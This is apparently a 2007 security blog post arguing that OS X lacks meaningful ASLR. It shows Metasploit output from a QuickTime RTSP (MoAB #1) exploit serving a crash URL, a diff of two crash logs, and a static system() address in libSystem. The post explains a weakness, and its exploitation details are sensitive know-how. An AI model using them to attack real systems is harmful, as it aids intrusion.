One of the posters to my “Bill Gates fights back” posted a very intresting statement that I felt deserved an entire blog entry for.
“First off, check the address spaces of the same framework on two different computers crash logs on OS X. Not identical.”
Ok. Because of my job I just happen to have a DoS and a weaponizied version of MoAB #1 lying around. Since popping a shell won’t get me the crash logs I need, we have got to use the DoS. I wrote the exploit based on HDM’s WMF module, its pretty nifty.
msf exploit(MOAB-01-Quicktime_rtsp) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.1.108:8080/X34OVYSZq7nAQf5
[*] Server started.
[*] Exploit running as background job.
msf exploit(MOAB-01-Quicktime_rtsp) >
So going to the URL http://192.168.1.108:8080/X34OVYSZq7nAQf5 will get a crash. I do this on my desktop machine (a mac mini) and my test machine (also a mac mini). And I get a crash on each.
So I diff the two.
$ diff testmacmini.log desktop.crash.log
<> Host Name: david-maynors-computer-2
> Date/Time: 2007-02-05 08:55:15.473 -0500
<> Parent: WindowServer 
<> PID: 191
<> Thread 4:
> 0 libSystem.B.dylib 0x9001aafc select + 12
> 1 libSystem.B.dylib 0x90024b07 _pthread_body + 84
<> 0x5ae000 - 0x5affff com.apple.textencoding.unicode 2.1 /System/Library/TextEncodings/Unicode Encodings.bundle/Contents/MacOS/Unicode Encodings
> 0x14bc5000 - 0x14bd3fff com.apple.quicktime.webplugin 7.0.4 /Library/Internet Plug-Ins/QuickTime Plugin.webplugin/Contents/MacOS/QuickTime Plugin
> 0x15092000 - 0x150aefff GLDriver /System/Library/Frameworks/OpenGL.framework/Versions/A/Resources/GLDriver.bundle/GLDriver
> 0x150b5000 - 0x150d6fff GLRendererFloat /System/Library/Frameworks/OpenGL.framework/Versions/A/Resources/GLRendererFloat.bundle/GLRendererFloat
> 0x15169000 - 0x152aafff GLEngine /System/Library/Frameworks/OpenGL.framework/Resources/GLEngine.bundle/GLEngine
> 0x152d2000 - 0x15327fff com.apple.driver.AppleIntelGMA950GLDriver 1.4.32 (4.3.2) /System/Library/Extensions/AppleIntelGMA950GLDriver.bundle/Contents/MacOS/AppleIntelGMA950GLDriver
Yes indeed there are some differences. This does not mean ASLR has been implemented. In order to take advantage of this vulnerability you need the address of System() to stay static. That is contained in the libSystem library which stays static across machines.
0x90000000 - 0x9016efff libSystem.B.dylib /usr/lib/libSystem.B.dylib
The address of the System() function is at 0x90046c30 on both machines. The libraries containing this never change location, only some of the framework stuff. The fact some of the framework addresses load at different addresses does not provide you with any security benefit.
If you want to see the full crash logs email me and I am happy to send them over.